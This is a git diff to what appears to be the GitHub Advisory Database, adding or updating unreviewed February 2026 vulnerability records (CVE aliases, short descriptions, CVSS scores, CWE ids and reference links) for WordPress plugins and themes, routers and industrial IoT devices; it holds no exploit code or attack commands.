--git a/advisories/unreviewed/2026/02/GHSA-3cmc-gqgq-xmxq/GHSA-3cmc-gqgq-xmxq.json b/advisories/unreviewed/2026/02/GHSA-3cmc-gqgq-xmxq/GHSA-3cmc-gqgq-xmxq.json index a894d62b25454..6917562c321e0 100644 --- a/advisories/unreviewed/2026/02/GHSA-3cmc-gqgq-xmxq/GHSA-3cmc-gqgq-xmxq.json +++ b/advisories/unreviewed/2026/02/GHSA-3cmc-gqgq-xmxq/GHSA-3cmc-gqgq-xmxq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3cmc-gqgq-xmxq", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25324" ], "details": "Authorization Bypass Through User-Controlled Key vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quiz And Survey Master: from n/a through <= 10.3.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-639" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:16Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3fr7-jch8-4qjv/GHSA-3fr7-jch8-4qjv.json b/advisories/unreviewed/2026/02/GHSA-3fr7-jch8-4qjv/GHSA-3fr7-jch8-4qjv.json new file mode 100644 index 0000000000000..6c3c56b22be48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3fr7-jch8-4qjv/GHSA-3fr7-jch8-4qjv.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fr7-jch8-4qjv", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24455" + ], + "details": "The embedded web interface of the device does not support HTTPS/TLS for \nauthentication and uses HTTP Basic Authentication. Traffic is encoded \nbut not encrypted, exposing user credentials to passive interception by \nattackers on the same network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24455" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json b/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json new file mode 100644 index 0000000000000..1df04f7de316b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3g7r-h8fj-xc5g", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22378" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Blabber blabber allows PHP Local File Inclusion.This issue affects Blabber: from n/a through <= 1.7.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22378" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/blabber/vulnerability/wordpress-blabber-theme-1-7-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3h5g-fffj-jhx9/GHSA-3h5g-fffj-jhx9.json b/advisories/unreviewed/2026/02/GHSA-3h5g-fffj-jhx9/GHSA-3h5g-fffj-jhx9.json new file mode 100644 index 0000000000000..2dca3f5e8714b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3h5g-fffj-jhx9/GHSA-3h5g-fffj-jhx9.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3h5g-fffj-jhx9", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68841" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Themepul TopperPack – Complete Elementor Addons, Theme & CPT Builder topper-pack allows PHP Local File Inclusion.This issue affects TopperPack – Complete Elementor Addons, Theme & CPT Builder: from n/a through <= 1.2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68841" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/topper-pack/vulnerability/wordpress-topperpack-complete-elementor-addons-theme-cpt-builder-plugin-1-1-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3mfv-m4f8-5m67/GHSA-3mfv-m4f8-5m67.json b/advisories/unreviewed/2026/02/GHSA-3mfv-m4f8-5m67/GHSA-3mfv-m4f8-5m67.json new file mode 100644 index 0000000000000..d20a64e42d05f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3mfv-m4f8-5m67/GHSA-3mfv-m4f8-5m67.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mfv-m4f8-5m67", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68021" + ], + "details": "Missing Authorization vulnerability in ConveyThis ConveyThis conveythis-translate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ConveyThis: from n/a through <= 269.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68021" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/conveythis-translate/vulnerability/wordpress-conveythis-plugin-268-10-broken-access-control-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3pw3-vpq3-qmc9/GHSA-3pw3-vpq3-qmc9.json b/advisories/unreviewed/2026/02/GHSA-3pw3-vpq3-qmc9/GHSA-3pw3-vpq3-qmc9.json new file mode 100644 index 0000000000000..06a0b1639c347 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3pw3-vpq3-qmc9/GHSA-3pw3-vpq3-qmc9.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3pw3-vpq3-qmc9", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69399" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Cobble cobble allows PHP Local File Inclusion.This issue affects Cobble: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69399" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/cobble/vulnerability/wordpress-cobble-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json b/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json new file mode 100644 index 0000000000000..6e09c9e1285cf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3r56-xx7r-cr9c", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69388" + ], + "details": "Missing Authorization vulnerability in cliengo Cliengo – Chatbot cliengo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cliengo – Chatbot: from n/a through <= 3.0.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69388" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/cliengo/vulnerability/wordpress-cliengo-chatbot-plugin-3-0-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3rcg-gg9q-9688/GHSA-3rcg-gg9q-9688.json b/advisories/unreviewed/2026/02/GHSA-3rcg-gg9q-9688/GHSA-3rcg-gg9q-9688.json new file mode 100644 index 0000000000000..4c7ed472a62e5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3rcg-gg9q-9688/GHSA-3rcg-gg9q-9688.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rcg-gg9q-9688", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69407" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Struktur struktur allows PHP Local File Inclusion.This issue affects Struktur: from n/a through <= 2.5.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69407" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/struktur/vulnerability/wordpress-struktur-theme-2-5-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3rhf-g27v-qpj7/GHSA-3rhf-g27v-qpj7.json b/advisories/unreviewed/2026/02/GHSA-3rhf-g27v-qpj7/GHSA-3rhf-g27v-qpj7.json new file mode 100644 index 0000000000000..f9436584e8fd4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3rhf-g27v-qpj7/GHSA-3rhf-g27v-qpj7.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rhf-g27v-qpj7", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69403" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in Bravis-Themes Bravis Addons bravis-addons allows Using Malicious Files.This issue affects Bravis Addons: from n/a through <= 1.1.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69403" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bravis-addons/vulnerability/wordpress-bravis-addons-plugin-1-1-9-arbitrary-file-upload-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3v2x-94p8-whg9/GHSA-3v2x-94p8-whg9.json b/advisories/unreviewed/2026/02/GHSA-3v2x-94p8-whg9/GHSA-3v2x-94p8-whg9.json index 66410bb2ec0b4..528a4894884aa 100644 --- a/advisories/unreviewed/2026/02/GHSA-3v2x-94p8-whg9/GHSA-3v2x-94p8-whg9.json +++ b/advisories/unreviewed/2026/02/GHSA-3v2x-94p8-whg9/GHSA-3v2x-94p8-whg9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3v2x-94p8-whg9", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25315" ], "details": "Missing Authorization vulnerability in hcaptcha hCaptcha for WP hcaptcha-for-forms-and-more allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects hCaptcha for WP: from n/a through <= 4.22.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3vr9-ghwq-fh8h/GHSA-3vr9-ghwq-fh8h.json b/advisories/unreviewed/2026/02/GHSA-3vr9-ghwq-fh8h/GHSA-3vr9-ghwq-fh8h.json new file mode 100644 index 0000000000000..6df49218fce3c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3vr9-ghwq-fh8h/GHSA-3vr9-ghwq-fh8h.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vr9-ghwq-fh8h", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26048" + ], + "details": "The Wi-Fi router is vulnerable to de-authentication attacks due to the \nabsence of management frame protection, allowing forged deauthentication\n and disassociation frames to be broadcast without authentication or \nencryption. An attacker can use this to cause unauthorized disruptions \nand create a denial-of-service condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26048" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json b/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json new file mode 100644 index 0000000000000..2742fee72f225 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42h9-mr3g-6gc2", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26721" + ], + "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to obtain sensitive information via the sid query parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26721" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26721" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-42qj-j5qx-4j25/GHSA-42qj-j5qx-4j25.json b/advisories/unreviewed/2026/02/GHSA-42qj-j5qx-4j25/GHSA-42qj-j5qx-4j25.json new file mode 100644 index 0000000000000..a601fbd073115 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-42qj-j5qx-4j25/GHSA-42qj-j5qx-4j25.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42qj-j5qx-4j25", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22885" + ], + "details": "A vulnerability exists in EnOcean SmartServer IoT version 4.60.009 and \nprior, which would allow remote attackers, in the LON IP-852 management \nmessages, to send specially crafted IP-852 messages resulting in a \nmemory leak from the program's memory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22885" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/DrftSSIoT/pages/1475410/SmartServer+IoT+Release+Notes#Current-Stable-Release" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/IEC/pages/288063529/Enhancing+Security" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-01.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-42vx-f9wx-wg3r/GHSA-42vx-f9wx-wg3r.json b/advisories/unreviewed/2026/02/GHSA-42vx-f9wx-wg3r/GHSA-42vx-f9wx-wg3r.json new file mode 100644 index 0000000000000..ab3b5a827cb54 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-42vx-f9wx-wg3r/GHSA-42vx-f9wx-wg3r.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42vx-f9wx-wg3r", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26093" + ], + "details": "Improper Neutralization of Special Elements used in a Command ('Command Injection') in Owl opds 2.2.0.4 allows Command Injection via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26093" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26093" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json b/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json new file mode 100644 index 0000000000000..5d71126f9afd7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-43rm-rg7w-7rjf", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68863" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zack Katz iContact for Gravity Forms gravity-forms-icontact allows Reflected XSS.This issue affects iContact for Gravity Forms: from n/a through <= 1.3.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68863" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/gravity-forms-icontact/vulnerability/wordpress-icontact-for-gravity-forms-plugin-1-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json b/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json new file mode 100644 index 0000000000000..0d4372d3c8b9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-43ww-vg8r-97hv", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22374" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Zio Alberto zioalberto allows PHP Local File Inclusion.This issue affects Zio Alberto: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22374" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/zioalberto/vulnerability/wordpress-zio-alberto-theme-1-2-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-46ph-2qpx-729g/GHSA-46ph-2qpx-729g.json b/advisories/unreviewed/2026/02/GHSA-46ph-2qpx-729g/GHSA-46ph-2qpx-729g.json new file mode 100644 index 0000000000000..895a5f0e5131c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-46ph-2qpx-729g/GHSA-46ph-2qpx-729g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-46ph-2qpx-729g", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69395" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Gable gable allows PHP Local File Inclusion.This issue affects Gable: from n/a through <= 1.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69395" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/gable/vulnerability/wordpress-gable-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-47ph-88gx-hg42/GHSA-47ph-88gx-hg42.json b/advisories/unreviewed/2026/02/GHSA-47ph-88gx-hg42/GHSA-47ph-88gx-hg42.json new file mode 100644 index 0000000000000..989e18355871d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-47ph-88gx-hg42/GHSA-47ph-88gx-hg42.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47ph-88gx-hg42", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-2846" + ], + "details": "A security vulnerability has been detected in UTT HiPER 520 1.7.7-160105. This impacts the function sub_44D264 of the file /goform/formPdbUpConfig of the component Web Management Interface. The manipulation of the argument policyNames leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2846" + }, + { + "type": "WEB", + "url": "https://github.com/cha0yang1/UTT520CVE/blob/main/UTTRCE1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347082" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347082" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753964" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-48pc-4fq3-jhwg/GHSA-48pc-4fq3-jhwg.json b/advisories/unreviewed/2026/02/GHSA-48pc-4fq3-jhwg/GHSA-48pc-4fq3-jhwg.json new file mode 100644 index 0000000000000..0e22dc6173df3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-48pc-4fq3-jhwg/GHSA-48pc-4fq3-jhwg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-48pc-4fq3-jhwg", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69322" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes PeakShops peakshops allows PHP Local File Inclusion.This issue affects PeakShops: from n/a through < 1.5.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69322" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/peakshops/vulnerability/wordpress-peakshops-theme-1-5-9-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4cfj-pm5j-9qhf/GHSA-4cfj-pm5j-9qhf.json b/advisories/unreviewed/2026/02/GHSA-4cfj-pm5j-9qhf/GHSA-4cfj-pm5j-9qhf.json index 3037f3d81cec8..11eeeef4d6a1b 100644 --- a/advisories/unreviewed/2026/02/GHSA-4cfj-pm5j-9qhf/GHSA-4cfj-pm5j-9qhf.json +++ b/advisories/unreviewed/2026/02/GHSA-4cfj-pm5j-9qhf/GHSA-4cfj-pm5j-9qhf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4cfj-pm5j-9qhf", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25326" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in cmsmasters CMSMasters Content Composer cmsmasters-content-composer allows PHP Local File Inclusion.This issue affects CMSMasters Content Composer: from n/a through <= 1.4.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4f62-jjjx-4hrr/GHSA-4f62-jjjx-4hrr.json b/advisories/unreviewed/2026/02/GHSA-4f62-jjjx-4hrr/GHSA-4f62-jjjx-4hrr.json new file mode 100644 index 0000000000000..df67a8bad9492 --- /dev/null +++ 